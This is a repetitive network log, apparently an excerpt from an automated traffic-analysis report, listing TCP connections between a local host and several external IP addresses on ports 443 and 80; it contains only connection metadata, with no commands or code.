                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
